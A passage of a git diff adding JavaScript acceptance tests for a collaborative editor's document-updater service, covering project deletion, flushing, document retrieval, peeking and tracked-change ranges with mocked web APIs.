DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Deleting a project', function () { + beforeEach(function (done) { + let docId0, docId1 + this.project_id = DocUpdaterClient.randomId() + this.docs = [ + { + id: (docId0 = DocUpdaterClient.randomId()), + lines: ['one', 'two', 'three'], + update: { + doc: docId0, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: 0, + }, + updatedLines: ['one', 'one and a half', 'two', 'three'], + }, + { + id: (docId1 = DocUpdaterClient.randomId()), + lines: ['four', 'five', 'six'], + update: { + doc: docId1, + op: [ + { + i: 'four and a half\n', + p: 5, + }, + ], + v: 0, + }, + updatedLines: ['four', 'four and a half', 'five', 'six'], + }, + ] + for (const doc of Array.from(this.docs)) { + MockWebApi.insertDoc(this.project_id, doc.id, { + lines: doc.lines, + version: doc.update.v, + }) + } + + DocUpdaterApp.ensureRunning(done) + }) + + describe('without updates', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + callback(error) + }) + } + }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProject( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + done() + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should not send any document to the web api', function () { + MockWebApi.setDocument.should.not.have.been.called + }) + + it('should need to reload the docs if read again', function (done) { + sinon.spy(MockWebApi, 'getDocument') + async.series( + this.docs.map(doc => { + return callback => { + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(false) + DocUpdaterClient.getDoc( + this.project_id, + doc.id, + (error, res, returnedDoc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(true) + callback() + } + ) + } + }), + () => { + MockWebApi.getDocument.restore() + done() + } + ) + }) + + it('should flush each doc in project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('with documents which have been updated', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + if (error != null) { + return callback(error) + } + DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + callback(error) + } + ) + }) + } + }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProject( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + done() + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should send each document to the web api', function () { + Array.from(this.docs).map(doc => + MockWebApi.setDocument + .calledWith(this.project_id, doc.id, doc.updatedLines) + .should.equal(true) + ) + }) + + it('should need to reload the docs if read again', function (done) { + sinon.spy(MockWebApi, 'getDocument') + async.series( + this.docs.map(doc => { + return callback => { + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(false) + DocUpdaterClient.getDoc( + this.project_id, + doc.id, + (error, res, returnedDoc) => { + if (error) return done(error) + MockWebApi.getDocument + .calledWith(this.project_id, doc.id) + .should.equal(true) + callback() + } + ) + } + }), + () => { + MockWebApi.getDocument.restore() + done() + } + ) + }) + + it('should flush each doc in project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('with the background=true parameter from realtime and no request to flush the queue', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + if (error != null) { + return callback(error) + } + DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + callback(error) + } + ) + }) + } + }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProjectOnShutdown( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + done() + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should not send any documents to the web api', function () { + MockWebApi.setDocument.called.should.equal(false) + }) + + it('should not flush to project history', function () { + MockProjectHistoryApi.flushProject.called.should.equal(false) + }) + }) + + describe('with the background=true parameter from realtime and a request to flush the queue', function () { + beforeEach(function (done) { + sinon.spy(MockWebApi, 'setDocument') + sinon.spy(MockProjectHistoryApi, 'flushProject') + + async.series( + this.docs.map(doc => { + return callback => { + DocUpdaterClient.preloadDoc(this.project_id, doc.id, error => { + if (error != null) { + return callback(error) + } + DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + callback(error) + } + ) + }) + } + }), + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.deleteProjectOnShutdown( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + // after deleting the project and putting it in the queue, flush the queue + setTimeout(() => DocUpdaterClient.flushOldProjects(done), 2000) + } + ) + }, 200) + } + ) + }) + + afterEach(function () { + MockWebApi.setDocument.restore() + MockProjectHistoryApi.flushProject.restore() + }) + + it('should return a 204 status code', function () { + this.statusCode.should.equal(204) + }) + + it('should send each document to the web api', function () { + Array.from(this.docs).map(doc => + MockWebApi.setDocument + .calledWith(this.project_id, doc.id, doc.updatedLines) + .should.equal(true) + ) + }) + + it('should flush to project history', function () { + MockProjectHistoryApi.flushProject.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/FlushingAProjectTests.js b/services/document-updater/test/acceptance/js/FlushingAProjectTests.js new file mode 100644 index 0000000..3f60004 --- /dev/null +++ b/services/document-updater/test/acceptance/js/FlushingAProjectTests.js @@ -0,0 +1,141 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const async = require('async') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Flushing a project', function () { + before(function (done) { + let docId0, docId1 + this.project_id = DocUpdaterClient.randomId() + this.docs = [ + { + id: (docId0 = DocUpdaterClient.randomId()), + lines: ['one', 'two', 'three'], + update: { + doc: docId0, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: 0, + }, + updatedLines: ['one', 'one and a half', 'two', 'three'], + }, + { + id: (docId1 = DocUpdaterClient.randomId()), + lines: ['four', 'five', 'six'], + update: { + doc: docId1, + op: [ + { + i: 'four and a half\n', + p: 5, + }, + ], + v: 0, + }, + updatedLines: ['four', 'four and a half', 'five', 'six'], + }, + ] + for (const doc of Array.from(this.docs)) { + MockWebApi.insertDoc(this.project_id, doc.id, { + lines: doc.lines, + version: doc.update.v, + }) + } + return DocUpdaterApp.ensureRunning(done) + }) + + return describe('with documents which have been updated', function () { + before(function (done) { + sinon.spy(MockWebApi, 'setDocument') + + return async.series( + this.docs.map(doc => { + return callback => { + return DocUpdaterClient.preloadDoc( + this.project_id, + doc.id, + error => { + if (error != null) { + return callback(error) + } + return DocUpdaterClient.sendUpdate( + this.project_id, + doc.id, + doc.update, + error => { + return callback(error) + } + ) + } + ) + } + }), + error => { + if (error != null) { + throw error + } + return setTimeout(() => { + return DocUpdaterClient.flushProject( + this.project_id, + (error, res, body) => { + if (error) return done(error) + this.statusCode = res.statusCode + return done() + } + ) + }, 200) + } + ) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + it('should return a 204 status code', function () { + return this.statusCode.should.equal(204) + }) + + it('should send each document to the web api', function () { + return Array.from(this.docs).map(doc => + MockWebApi.setDocument + .calledWith(this.project_id, doc.id, doc.updatedLines) + .should.equal(true) + ) + }) + + return it('should update the lines in the doc updater', function (done) { + return async.series( + this.docs.map(doc => { + return callback => { + return DocUpdaterClient.getDoc( + this.project_id, + doc.id, + (error, res, returnedDoc) => { + if (error) return done(error) + returnedDoc.lines.should.deep.equal(doc.updatedLines) + return callback() + } + ) + } + }), + done + ) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/FlushingDocsTests.js b/services/document-updater/test/acceptance/js/FlushingDocsTests.js new file mode 100644 index 0000000..d6c5d85 --- /dev/null +++ b/services/document-updater/test/acceptance/js/FlushingDocsTests.js @@ -0,0 +1,162 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const async = require('async') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Flushing a doc to Mongo', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.update = { + doc: this.doc_id, + meta: { user_id: 'last-author-fake-id' }, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when the updated doc exists in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon.spy(MockWebApi, 'setDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.sendUpdates( + this.project_id, + this.doc_id, + [this.update], + error => { + if (error != null) { + throw error + } + return setTimeout(() => { + return DocUpdaterClient.flushDoc(this.project_id, this.doc_id, done) + }, 200) + } + ) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + it('should flush the updated doc lines and version to the web api', function () { + return MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.result, this.version + 1) + .should.equal(true) + }) + + return it('should flush the last update author and time to the web api', function () { + const lastUpdatedAt = MockWebApi.setDocument.lastCall.args[5] + parseInt(lastUpdatedAt).should.be.closeTo(new Date().getTime(), 30000) + + const lastUpdatedBy = MockWebApi.setDocument.lastCall.args[6] + return lastUpdatedBy.should.equal('last-author-fake-id') + }) + }) + + describe('when the doc does not exist in the doc updater', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + }) + sinon.spy(MockWebApi, 'setDocument') + return DocUpdaterClient.flushDoc(this.project_id, this.doc_id, done) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + return it('should not flush the doc to the web api', function () { + return MockWebApi.setDocument.called.should.equal(false) + }) + }) + + return describe('when the web api http request takes a long time on first request', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + let t = 30000 + sinon + .stub(MockWebApi, 'setDocument') + .callsFake( + ( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy, + callback + ) => { + if (callback == null) { + callback = function () {} + } + setTimeout(callback, t) + return (t = 0) + } + ) + return DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, done) + }) + + after(function () { + return MockWebApi.setDocument.restore() + }) + + return it('should still work', function (done) { + const start = Date.now() + return DocUpdaterClient.flushDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(204) + const delta = Date.now() - start + expect(delta).to.be.below(20000) + return done() + } + ) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/GettingADocumentTests.js b/services/document-updater/test/acceptance/js/GettingADocumentTests.js new file mode 100644 index 0000000..6529893 --- /dev/null +++ b/services/document-updater/test/acceptance/js/GettingADocumentTests.js @@ -0,0 +1,293 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Getting a document', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when the document is not loaded', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon.spy(MockWebApi, 'getDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + if (error) return done(error) + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should load the document from the web API', function () { + return MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the document lines', function () { + return this.returnedDoc.lines.should.deep.equal(this.lines) + }) + + return it('should return the document at its current version', function () { + return this.returnedDoc.version.should.equal(this.version) + }) + }) + + describe('when the document is already loaded', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + if (error) return done(error) + this.returnedDoc = returnedDoc + return done() + } + ) + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should not load the document from the web API', function () { + return MockWebApi.getDocument.called.should.equal(false) + }) + + return it('should return the document lines', function () { + return this.returnedDoc.lines.should.deep.equal(this.lines) + }) + }) + + describe('when the request asks for some recent ops', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: (this.lines = ['one', 'two', 'three']), + }) + + this.updates = __range__(0, 199, true).map(v => ({ + doc_id: this.doc_id, + op: [{ i: v.toString(), p: 0 }], + v, + })) + + return DocUpdaterClient.sendUpdates( + this.project_id, + this.doc_id, + this.updates, + error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + describe('when the ops are loaded', function () { + before(function (done) { + return DocUpdaterClient.getDocAndRecentOps( + this.project_id, + this.doc_id, + 190, + (error, res, returnedDoc) => { + if (error) return done(error) + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + return it('should return the recent ops', function () { + this.returnedDoc.ops.length.should.equal(10) + return Array.from(this.updates.slice(190, -1)).map((update, i) => + this.returnedDoc.ops[i].op.should.deep.equal(update.op) + ) + }) + }) + + return describe('when the ops are not all loaded', function () { + before(function (done) { + // We only track 100 ops + return DocUpdaterClient.getDocAndRecentOps( + this.project_id, + this.doc_id, + 10, + (error, res, returnedDoc) => { + if (error) return done(error) + this.res = res + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + return it('should return UnprocessableEntity', function () { + return this.res.statusCode.should.equal(422) + }) + }) + }) + + describe('when the document does not exist', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + this.statusCode = res.statusCode + return done() + } + ) + }) + + return it('should return 404', function () { + return this.statusCode.should.equal(404) + }) + }) + + describe('when the web api returns an error', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon + .stub(MockWebApi, 'getDocument') + .callsFake((projectId, docId, callback) => { + if (callback == null) { + callback = function () {} + } + return callback(new Error('oops')) + }) + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + this.statusCode = res.statusCode + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + return it('should return 500', function () { + return this.statusCode.should.equal(500) + }) + }) + + return describe('when the web api http request takes a long time', function () { + before(function (done) { + this.timeout = 10000 + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon + .stub(MockWebApi, 'getDocument') + .callsFake((projectId, docId, callback) => { + if (callback == null) { + callback = function () {} + } + return setTimeout(callback, 30000) + }) + return done() + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + return it('should return quickly(ish)', function (done) { + const start = Date.now() + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(500) + const delta = Date.now() - start + expect(delta).to.be.below(20000) + return done() + } + ) + }) + }) +}) + +function __range__(left, right, inclusive) { + const range = [] + const ascending = left < right + const end = !inclusive ? right : ascending ? right + 1 : right - 1 + for (let i = left; ascending ? i < end : i > end; ascending ? i++ : i--) { + range.push(i) + } + return range +} diff --git a/services/document-updater/test/acceptance/js/GettingProjectDocsTests.js b/services/document-updater/test/acceptance/js/GettingProjectDocsTests.js new file mode 100644 index 0000000..07bdd85 --- /dev/null +++ b/services/document-updater/test/acceptance/js/GettingProjectDocsTests.js @@ -0,0 +1,176 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Getting documents for project', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when project state hash does not match', function () { + before(function (done) { + this.projectStateHash = DocUpdaterClient.randomId() + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res, returnedDocs) => { + if (error) return done(error) + this.res = res + this.returnedDocs = returnedDocs + return done() + } + ) + } + ) + }) + + return it('should return a 409 Conflict response', function () { + return this.res.statusCode.should.equal(409) + }) + }) + + describe('when project state hash matches', function () { + before(function (done) { + this.projectStateHash = DocUpdaterClient.randomId() + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res0, returnedDocs0) => { + if (error) return done(error) + // set the hash + this.res0 = res0 + this.returnedDocs0 = returnedDocs0 + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res, returnedDocs) => { + if (error) return done(error) + // the hash should now match + this.res = res + this.returnedDocs = returnedDocs + return done() + } + ) + } + ) + } + ) + }) + + it('should return a 200 response', function () { + return this.res.statusCode.should.equal(200) + }) + + return it('should return the documents', function () { + return this.returnedDocs.should.deep.equal([ + { _id: this.doc_id, lines: this.lines, v: this.version }, + ]) + }) + }) + + return describe('when the doc has been removed', function () { + before(function (done) { + this.projectStateHash = DocUpdaterClient.randomId() + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res0, returnedDocs0) => { + if (error) return done(error) + // set the hash + this.res0 = res0 + this.returnedDocs0 = returnedDocs0 + return DocUpdaterClient.deleteDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + // delete the doc + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res1, returnedDocs) => { + if (error) return done(error) + // the hash would match, but the doc has been deleted + this.res = res1 + this.returnedDocs = returnedDocs + return done() + } + ) + } + ) + } + ) + } + ) + }) + + return it('should return a 409 Conflict response', function () { + return this.res.statusCode.should.equal(409) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/PeekingADoc.js b/services/document-updater/test/acceptance/js/PeekingADoc.js new file mode 100644 index 0000000..94ce16e --- /dev/null +++ b/services/document-updater/test/acceptance/js/PeekingADoc.js @@ -0,0 +1,100 @@ +const sinon = require('sinon') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Peeking a document', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + sinon.spy(MockWebApi, 'getDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + return DocUpdaterClient.peekDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + this.error = error + this.res = res + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should return a 404 response', function () { + this.res.statusCode.should.equal(404) + }) + + it('should not load the document from the web API', function () { + return MockWebApi.getDocument.called.should.equal(false) + }) + }) + + describe('when the document is already loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + if (error) return done(error) + this.res = res + this.returnedDoc = returnedDoc + return done() + } + ) + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should return a 200 response', function () { + this.res.statusCode.should.equal(200) + }) + + it('should return the document lines', function () { + return this.returnedDoc.lines.should.deep.equal(this.lines) + }) + + it('should return the document version', function () { + return this.returnedDoc.version.should.equal(this.version) + }) + + it('should not load the document from the web API', function () { + return MockWebApi.getDocument.called.should.equal(false) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/RangesTests.js b/services/document-updater/test/acceptance/js/RangesTests.js new file mode 100644 index 0000000..424ea7e --- /dev/null +++ b/services/document-updater/test/acceptance/js/RangesTests.js @@ -0,0 +1,882 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const async = require('async') + +const { db, ObjectId } = require('../../../app/js/mongodb') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') +const RangesManager = require('../../../app/js/RangesManager') + +const sandbox = sinon.createSandbox() + +describe('Ranges', function () { + before(function (done) { + DocUpdaterApp.ensureRunning(done) + }) + + describe('tracking changes from ops', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = '587357bd35e64f6157' + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa'], + } + this.updates = [ + { + doc: this.doc.id, + op: [{ i: '123', p: 1 }], + v: 0, + meta: { user_id: this.user_id }, + }, + { + doc: this.doc.id, + op: [{ i: '456', p: 5 }], + v: 1, + meta: { user_id: this.user_id, tc: this.id_seed }, + }, + { + doc: this.doc.id, + op: [{ d: '12', p: 1 }], + v: 2, + meta: { user_id: this.user_id }, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + + DocUpdaterApp.ensureRunning(error => { + if (error != null) { + throw error + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + done() + }) + }) + }) + }) + + it('should update the ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const change = ranges.changes[0] + change.op.should.deep.equal({ i: '456', p: 3 }) + change.id.should.equal(this.id_seed + '000001') + change.metadata.user_id.should.equal(this.user_id) + done() + } + ) + }) + + describe('Adding comments', function () { + describe('standalone', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['foo bar baz'], + } + this.updates = [ + { + doc: this.doc.id, + op: [ + { c: 'bar', p: 4, t: (this.tid = DocUpdaterClient.randomId()) }, + ], + v: 0, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + }) + }) + }) + + it('should update the ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const comment = ranges.comments[0] + comment.op.should.deep.equal({ c: 'bar', p: 4, t: this.tid }) + comment.id.should.equal(this.tid) + done() + } + ) + }) + }) + + describe('with conflicting ops needing OT', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['foo bar baz'], + } + this.updates = [ + { + doc: this.doc.id, + op: [{ i: 'ABC', p: 3 }], + v: 0, + meta: { user_id: this.user_id }, + }, + { + doc: this.doc.id, + op: [ + { c: 'bar', p: 4, t: (this.tid = DocUpdaterClient.randomId()) }, + ], + v: 0, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + }) + }) + }) + + it('should update the comments with the OT shifted comment', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const comment = ranges.comments[0] + comment.op.should.deep.equal({ c: 'bar', p: 7, t: this.tid }) + done() + } + ) + }) + }) + }) + }) + + describe('Loading ranges from persistence layer', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = '587357bd35e64f6157' + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['a123aa'], + } + this.update = { + doc: this.doc.id, + op: [{ i: '456', p: 5 }], + v: 0, + meta: { user_id: this.user_id, tc: this.id_seed }, + } + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + ranges: { + changes: [ + { + op: { i: '123', p: 1 }, + metadata: 